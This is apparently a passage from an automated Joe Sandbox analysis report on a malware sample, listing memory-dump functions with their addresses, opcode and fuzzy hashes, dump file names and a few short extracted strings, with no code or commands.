                                                    • Source File: 00000000.00000002.2006803717.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_55b0000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 01d89755bc27deaabaae446da6a86e781eac52f5940390eea4935ddf54768de6
                                                    • Instruction ID: 3518e91720ad7bfd541dfd838aece8e93cda26a1c2e80e5155507950a0b6e3a1
                                                    • Opcode Fuzzy Hash: 01d89755bc27deaabaae446da6a86e781eac52f5940390eea4935ddf54768de6
                                                    • Instruction Fuzzy Hash: 59E01A74E04208EFCB84DFA8D5456ACFBF4FB48310F10C1AA985993341D6719A42DF81
                                                    Function 055BB6CB Relevance: .0, Instructions: 22COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2006803717.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_55b0000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7df0993328ff229c22a701a44c5b3f6ce0cb1c2675817f0663a681caa6a76fde
                                                    • Instruction ID: 4459575e91eb8c14c03c7385293ca0dd1d4dedabffedf81b0ffc542873ea3680
                                                    • Opcode Fuzzy Hash: 7df0993328ff229c22a701a44c5b3f6ce0cb1c2675817f0663a681caa6a76fde
                                                    • Instruction Fuzzy Hash: E8E0DF6184E2849FCB01CFF8C6196E97FF4BF4A210B104CD7908587152D9B60A14AB51
                                                    Function 072969B0 Relevance: .0, Instructions: 21COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2007574800.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7290000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 870557e7140de213c78feabde4a5a82ffdebc38a0c159efc51d4e22f74a57402
                                                    • Instruction ID: c79b1a1ea61e2d2ccc815ada40e7a15733437aab2ac51bdb38bb1fa02f084b90
                                                    • Opcode Fuzzy Hash: 870557e7140de213c78feabde4a5a82ffdebc38a0c159efc51d4e22f74a57402
                                                    • Instruction Fuzzy Hash: F1E086F1425209DBDB01EFF4C4057ADBBF9DB09301F1444B5A40D93110EFB14A04A751
                                                    Function 07297E80 Relevance: .0, Instructions: 21COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2007574800.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7290000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 75e027616cc661245cd18421962c71dbfc120ed14b710e863de9108f43da99bd
                                                    • Instruction ID: d3d606a2809ed743cdb07aff9220c805ed6c9020c57390aad833e0eba5f6b91c
                                                    • Opcode Fuzzy Hash: 75e027616cc661245cd18421962c71dbfc120ed14b710e863de9108f43da99bd
                                                    • Instruction Fuzzy Hash: A9E04679928208EBCB04EF94D9419ADFF75FB49310F24C1A9EC4827350CB729E52EB80
                                                    Function 072983A8 Relevance: .0, Instructions: 20COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2007574800.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7290000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d531f3d934e6bace5d975b92c452589419703b81969d4daab51baa36b76dc6c8
                                                    • Instruction ID: 776b0330467dfb5efc863f3161c8ec9e992109e22a7d8907dcdec2b02df7bbb1
                                                    • Opcode Fuzzy Hash: d531f3d934e6bace5d975b92c452589419703b81969d4daab51baa36b76dc6c8
                                                    • Instruction Fuzzy Hash: F0E04F74914208EBCB04DF94D5459ACBB75AB46310F14D1A9AC0413340C7729A91DA84
                                                    Function 055BB6D8 Relevance: .0, Instructions: 20COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2006803717.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_55b0000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 66d6a8e8b8f8f843d0f454084912ef15b06457a4a77b527252a525c15a6a819f
                                                    • Instruction ID: 27fbfb3f4763b109a4bfa1dd235c741ff69dc9cce0ca8fee17f7c76cf278ec61
                                                    • Opcode Fuzzy Hash: 66d6a8e8b8f8f843d0f454084912ef15b06457a4a77b527252a525c15a6a819f
                                                    • Instruction Fuzzy Hash: BEE0C271809108EFDB00DFF5C509AEDBBFCBB09210F005CA6900583110EDB24E00AB91
                                                    Function 055B6160 Relevance: .0, Instructions: 20COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2006803717.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_55b0000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1769c5f14a8bc4de21b41465e592ecdfe4a35ae1d859e13821cee122c5479c3b
                                                    • Instruction ID: 6d57aafb38eac11b2d370ec4f96ff00d6054797773091f14f84ac4d6d1a16df4
                                                    • Opcode Fuzzy Hash: 1769c5f14a8bc4de21b41465e592ecdfe4a35ae1d859e13821cee122c5479c3b
                                                    • Instruction Fuzzy Hash: 42E01A35610015CFDF509E68E84C7EC77B2FB44216F4100A5E009EB1A2DB74998ACB10
                                                    Function 055BA1E8 Relevance: .0, Instructions: 20COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2006803717.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_55b0000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 820906ad5c31a2b6305ebc9e3f90cf2fd07456ba0d9b90261b924710c4a8976d
                                                    • Instruction ID: 0e44f8407a897cd77a00a98f0d3414c0bba32bbbf4ec3367dfafde8154b29235
                                                    • Opcode Fuzzy Hash: 820906ad5c31a2b6305ebc9e3f90cf2fd07456ba0d9b90261b924710c4a8976d
                                                    • Instruction Fuzzy Hash: 81E0C27140520CDFCB00DFF4C50A5EEBBF8FB0A210F00A5A6E51A83110FE725A88AB81
                                                    Function 055BC04D Relevance: .0, Instructions: 20COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2006803717.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_55b0000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 07cf01dfa65cddd3c1592e79c1c2f080063dcc38effded1bd7130e50910305d9
                                                    • Instruction ID: 2dd78c9b85ea9e8fe9fa54282655fb52ad5daa6bfa72caed290bc5b10c545d20
                                                    • Opcode Fuzzy Hash: 07cf01dfa65cddd3c1592e79c1c2f080063dcc38effded1bd7130e50910305d9
                                                    • Instruction Fuzzy Hash: 53F06C789012188FCBA1CF58C940B98BBF2FB08310F4040DAE449A3301C7709A918F00
                                                    Function 055BE060 Relevance: .0, Instructions: 20COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2006803717.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_55b0000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 15915b106e83505beeeddcd8b997feba49bffae3233ce662a428c4386dde98f9
                                                    • Instruction ID: 4244d3bb93fea1e8d5e61eea0fac9b33d06c72768f797e431d2f12c6de8d90fa
                                                    • Opcode Fuzzy Hash: 15915b106e83505beeeddcd8b997feba49bffae3233ce662a428c4386dde98f9
                                                    • Instruction Fuzzy Hash: 40F030B4A10285CFCB11DF74D998598BFB1FB49204F50D5A9FC55A7641CEB01902EF01
                                                    Function 07297D38 Relevance: .0, Instructions: 19COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2007574800.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7290000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: dd615d1795b3a9b49aa60e9c6ae78ed870db89da5dce600dd91bc30ba92e4662
                                                    • Instruction ID: 3d9901e0a828fa7a359221dfc1e64ee1ba00b90040893874b12dd51aa740738d
                                                    • Opcode Fuzzy Hash: dd615d1795b3a9b49aa60e9c6ae78ed870db89da5dce600dd91bc30ba92e4662
                                                    • Instruction Fuzzy Hash: 27E08CB4A28208DBCB04DFA4D5419ACBBB9AB46300F2481A8980813354CB72AE42DB90
                                                    Function 055BB418 Relevance: .0, Instructions: 19COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2006803717.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_55b0000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d487cd5a13361ee4efda931fec76c0bbafb70915053f0978cc2b6d9d0dc57678
                                                    • Instruction ID: 1a193af0fc20a41f4daeeb9f1eb5aa956f7bb0ed077905d8b3ed91b20eef1209
                                                    • Opcode Fuzzy Hash: d487cd5a13361ee4efda931fec76c0bbafb70915053f0978cc2b6d9d0dc57678
                                                    • Instruction Fuzzy Hash: DBE0C234908108DBCB04DFA4D5459ACFBB9FB45310F64C1ADD80913341CBB29E42DB81
                                                    Function 055B2358 Relevance: .0, Instructions: 19COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2006803717.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_55b0000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: df2d3da60e2142289e5668b3c3caa46c47389239f814725e1fe80d0142b0034f
                                                    • Instruction ID: 07aa3a7f4dc409bf378d8065df7d6062eb4bd189c34127bc919b7dea05664ae4
                                                    • Opcode Fuzzy Hash: df2d3da60e2142289e5668b3c3caa46c47389239f814725e1fe80d0142b0034f
                                                    • Instruction Fuzzy Hash: 3CE0E674D1120DEFCB04FFA5D95145E7BF5FB45204711455AD80493304EB716E11DB56
                                                    Function 055BBCFE Relevance: .0, Instructions: 19COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2006803717.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_55b0000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 68f4c7e4ea0404bc337a620fee3739cd03fc6eaa30df371122f42698c9102abc
                                                    • Instruction ID: 5af45b5e518df92548e2389f6f6fb88c9e233404b97869e101604822023882b7
                                                    • Opcode Fuzzy Hash: 68f4c7e4ea0404bc337a620fee3739cd03fc6eaa30df371122f42698c9102abc
                                                    • Instruction Fuzzy Hash: D7E08C31605214CFC350DB60E0848E8B736FB4A322F0044EAE10A9B212CBB19880DF20
                                                    Function 055BC588 Relevance: .0, Instructions: 18COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2006803717.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_55b0000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e02c1a2d54ec3a41a5f6bc173c591c9caedde84976bdc1f5f6e271b1946ef95a
                                                    • Instruction ID: 4e3c687fd4e19ea9695abe276a53aac89e4dd4f7ba2158c0b7671d4f3b59a146
                                                    • Opcode Fuzzy Hash: e02c1a2d54ec3a41a5f6bc173c591c9caedde84976bdc1f5f6e271b1946ef95a
                                                    • Instruction Fuzzy Hash: E9E08CB0804308EBC704DFA5D409AADBFB9AB06302F10C0A9F80452240CB718A80EF94
                                                    Function 055BDAE0 Relevance: .0, Instructions: 18COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2006803717.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_55b0000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 95a2fe6891828a75f74023c2be9a4c9cb1700c8987276bfe4125a725d9bbc123
                                                    • Instruction ID: 989e4d7dc73dd9e6581a4438ff12b984e836a61f6ec08fc810cea36f243440ab
                                                    • Opcode Fuzzy Hash: 95a2fe6891828a75f74023c2be9a4c9cb1700c8987276bfe4125a725d9bbc123
                                                    • Instruction Fuzzy Hash: 9EE092B1E50209DFD750EFA9C909B9EBBF5BF08300F2189A9D019E7211E7B496058F91
                                                    Function 0729EB48 Relevance: .0, Instructions: 17COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2007574800.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7290000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1c0f3457f50a38a145c16573e00337b5d623494e96e757c9cf25a44ad0e86c61
                                                    • Instruction ID: 4c66a7e4bbbd78d3f5387a7103da4e8d8acbc84117e59d0343621c72b0403652
                                                    • Opcode Fuzzy Hash: 1c0f3457f50a38a145c16573e00337b5d623494e96e757c9cf25a44ad0e86c61
                                                    • Instruction Fuzzy Hash: F7E017B0D21308EFCB44EFB8D54A69CFFF4BB04211F5081A9E808A3350EA705A80DF41
                                                    Function 055BFEE8 Relevance: .0, Instructions: 17COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2006803717.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_55b0000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5459dfaac2ddc23ce4c5cbd4dd0941fdeb07738e19bbdb6cab72c36e9e9e7d68
                                                    • Instruction ID: b6294cbdeb2ed0b185fb3ab221037d3a5ca3ba914724a5228aff7a79d600e393
                                                    • Opcode Fuzzy Hash: 5459dfaac2ddc23ce4c5cbd4dd0941fdeb07738e19bbdb6cab72c36e9e9e7d68
                                                    • Instruction Fuzzy Hash: F9E0C23090430CDBCB04EFB8E40829CBBB6FB40306F0080A9E80457340DAB09D44EF81
                                                    Function 055BDC10 Relevance: .0, Instructions: 14COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2006803717.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_55b0000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8534d056ed63f41550caa9138c722cf2739b7cd427204ac244ee3386fae0e37a
                                                    • Instruction ID: a0cb39e031dbb47e7c08e9e09d9c6308d01337223e31a06d6c11f627eb428f71
                                                    • Opcode Fuzzy Hash: 8534d056ed63f41550caa9138c722cf2739b7cd427204ac244ee3386fae0e37a
                                                    • Instruction Fuzzy Hash: 84D012321141089FAB80EFA4E840D76B7EDFB146007058432E508CB020F661E568E7A2
                                                    Function 055BBC09 Relevance: .0, Instructions: 13COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2006803717.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_55b0000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f2e1ee7d2f7482fc46e94b1e7ac8cc45701870e9fa5dc46580eddc75c901b0ad
                                                    • Instruction ID: 1d576ed1054556135c864b17ab9c2861fab2f4d4945937bdfc41e167c6eebeb2
                                                    • Opcode Fuzzy Hash: f2e1ee7d2f7482fc46e94b1e7ac8cc45701870e9fa5dc46580eddc75c901b0ad
                                                    • Instruction Fuzzy Hash: 68D0C97250A105DBDB005A94E44E4D8F734FB5636270044F3DA1E9901397720A15EFB0
                                                    Function 055B3EB8 Relevance: .0, Instructions: 12COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2006803717.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_55b0000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1dede3bf89e73c1a299267c2adf736f57dec5d59bec73e470f33810d7ee4b196
                                                    • Instruction ID: c718f840fca1e094b54e37f957f695b60c9db9f77c9e3e89bf6c7413a6fe27bb
                                                    • Opcode Fuzzy Hash: 1dede3bf89e73c1a299267c2adf736f57dec5d59bec73e470f33810d7ee4b196
                                                    • Instruction Fuzzy Hash: 36B09B2171413513D90435DD74155DE728D47C5560F510067D50D977454CD55C4102D9
                                                    Function 0729E118 Relevance: .0, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2007574800.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7290000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b66579e9a8242053540d958af2f814201397cbf45273d2ddc5ba6dc6b51f347b
                                                    • Instruction ID: e17880da0c04f95d554014147d6e7fbd567d7a08d81384037b696cbf2a6bfefa
                                                    • Opcode Fuzzy Hash: b66579e9a8242053540d958af2f814201397cbf45273d2ddc5ba6dc6b51f347b
                                                    • Instruction Fuzzy Hash: FBC08CB00203048BC2146799E80E328FFA89B45206F04C020B008010609FF15480EF12
                                                    Function 072991DC Relevance: .0, Instructions: 8COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2007574800.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7290000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5ceb9d5c9f4b7aedd450dcb56a67ab0fa4f59f32b241f84d495761f721884ed4
                                                    • Instruction ID: 0d530f68d6781617ccc9384c392571a4b394d9fd6ab3c5b401cd794394f7016b
                                                    • Opcode Fuzzy Hash: 5ceb9d5c9f4b7aedd450dcb56a67ab0fa4f59f32b241f84d495761f721884ed4
                                                    • Instruction Fuzzy Hash: 70B012E51B4500E18C2076645CD0D7A6961FFF6B41F44FC227248800C0CC618424F237

                                                    Non-executed Functions

                                                    Function 07296A00 Relevance: 6.0, Strings: 4, Instructions: 1015COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2007574800.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7290000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: TJxq$Tesq$pwq$xbvq
                                                    • API String ID: 0-2278277230
                                                    • Opcode ID: e5d0a13572fc77bce202f258c424f09728c9e212ac171bf200fe7b5a3f67decd
                                                    • Instruction ID: 566ec010b98a15c2508a7a67dfafb2ae86585adc0114bb05b423296c97fc3f92
                                                    • Opcode Fuzzy Hash: e5d0a13572fc77bce202f258c424f09728c9e212ac171bf200fe7b5a3f67decd
                                                    • Instruction Fuzzy Hash: 31B2B275E10229CFDB64CF69C984AD9BBB2BF89304F1581E9D509AB325DB319E81CF40
                                                    Function 055BA21F Relevance: 4.0, Strings: 3, Instructions: 243COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2006803717.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_55b0000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: TJxq$Tesq$xbvq
                                                    • API String ID: 0-371669003
                                                    • Opcode ID: dd38785e2f446153cb889c15cd34632fd07f2acc22d2a735dbb199c427733092
                                                    • Instruction ID: ec17f46319db5017e0e4f44b88a93fc99e0c2f02f5b1609a99d73daf5f1b92d3
                                                    • Opcode Fuzzy Hash: dd38785e2f446153cb889c15cd34632fd07f2acc22d2a735dbb199c427733092
                                                    • Instruction Fuzzy Hash: 66C16475E016188FDB58DF6AC984ADDBBF2BF88300F14C1A9D409AB365DB709A85CF50
                                                    Function 055B92B8 Relevance: 1.4, Strings: 1, Instructions: 164COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2006803717.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_55b0000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 4'sq
                                                    • API String ID: 0-1075809040
                                                    • Opcode ID: 7b33ad76f5fe69b001b173529294b369a9992f597a14a408acd4c4bfba9b1b2a
                                                    • Instruction ID: 5a4fd6e973f585f4e0d2100079fd6e55ffe42a91bf5597c293863bb92b0f86f8
                                                    • Opcode Fuzzy Hash: 7b33ad76f5fe69b001b173529294b369a9992f597a14a408acd4c4bfba9b1b2a
                                                    • Instruction Fuzzy Hash: C3611D71E103098FDB48EF7AE85169ABFF3BB89300F14D52AD104AB268DF75584ADB50
                                                    Function 055B92C8 Relevance: 1.4, Strings: 1, Instructions: 160COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2006803717.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_55b0000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 4'sq
                                                    • API String ID: 0-1075809040
                                                    • Opcode ID: 8991fcdb64fa33a1dab7be4c949fe9cf37ad66e8836b65d47c11ea3149a4e1c6
                                                    • Instruction ID: d777b296f84163ac6c735f81bdbade9d780c21feb0bc7d060e8f6dbe28d698cf
                                                    • Opcode Fuzzy Hash: 8991fcdb64fa33a1dab7be4c949fe9cf37ad66e8836b65d47c11ea3149a4e1c6
                                                    • Instruction Fuzzy Hash: EB610D70E107098FDB48EF7AE85169ABFF3BB89300F14D52AD104AB264DF71584ADB51
                                                    Function 0725D0D0 Relevance: 1.4, Strings: 1, Instructions: 159COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2007539710.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7250000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 4'sq
                                                    • API String ID: 0-1075809040
                                                    • Opcode ID: 1b9e55ecf7bc4ea60c1899bbc94daf2f54b8d6a15d48b00716e8c4a98df2a481
                                                    • Instruction ID: a6d5e4185696f662446882d5b51968ac47c082c5c02346b1758191f2cf06ae94
                                                    • Opcode Fuzzy Hash: 1b9e55ecf7bc4ea60c1899bbc94daf2f54b8d6a15d48b00716e8c4a98df2a481
                                                    • Instruction Fuzzy Hash: 63611C70E106098FD748EF6AE890A9ABFF3BB89305F54C52AD004EB264DFB05846DF51
                                                    Function 07250040 Relevance: 1.4, Strings: 1, Instructions: 104COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2007539710.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7250000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: +
                                                    • API String ID: 0-2126386893
                                                    • Opcode ID: debc98eb20099bc66ec44fd1a639a7a9470f6eeb2e6b114a0281864530d5d801
                                                    • Instruction ID: cd104443da2ed90e70aa54ec91a214176cdc05e7c083586909959b5da0d7ba0f
                                                    • Opcode Fuzzy Hash: debc98eb20099bc66ec44fd1a639a7a9470f6eeb2e6b114a0281864530d5d801
                                                    • Instruction Fuzzy Hash: 094163B1D156188BEB6CCF6B8C442CEFAF7AFC9310F14C1BA880CAA215EB7105958F45
                                                    Function 072569B0 Relevance: 1.3, Strings: 1, Instructions: 98COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2007539710.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7250000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: =
                                                    • API String ID: 0-2322244508
                                                    • Opcode ID: 562930f0e93d3c89d6236695dbeaa039701b132700a6aa3bbdd3ac441a9300a7
                                                    • Instruction ID: ee302780a4b66170097e154f7eb49256b97a24d5f62980f0d96d663ee2e6eb61
                                                    • Opcode Fuzzy Hash: 562930f0e93d3c89d6236695dbeaa039701b132700a6aa3bbdd3ac441a9300a7
                                                    • Instruction Fuzzy Hash: F34172B1D156198BEB5CCF6B8D4069AFAF7AFC9300F14C1B9C90CAB215DB3445868F44
                                                    Function 07250037 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2007539710.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7250000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: +
                                                    • API String ID: 0-2126386893
                                                    • Opcode ID: 6b5ce8004efcfc30473b2c1a04f42b6bd18d7a1f7dec8ca369c9538afcba7572
                                                    • Instruction ID: 0cdaf3650671d81b0b7dc7e857c389d9eeada76c74dc11b38abe8c20fe959261
                                                    • Opcode Fuzzy Hash: 6b5ce8004efcfc30473b2c1a04f42b6bd18d7a1f7dec8ca369c9538afcba7572
                                                    • Instruction Fuzzy Hash: 4E4149B1E156188BEB5CCF6B8D4028EFAF7AFC9310F18C1BA845CAA215EF3105568F55
                                                    Function 02F70A00 Relevance: .3, Instructions: 315COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2005324672.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                    Joe Sandbox IDA Plugin
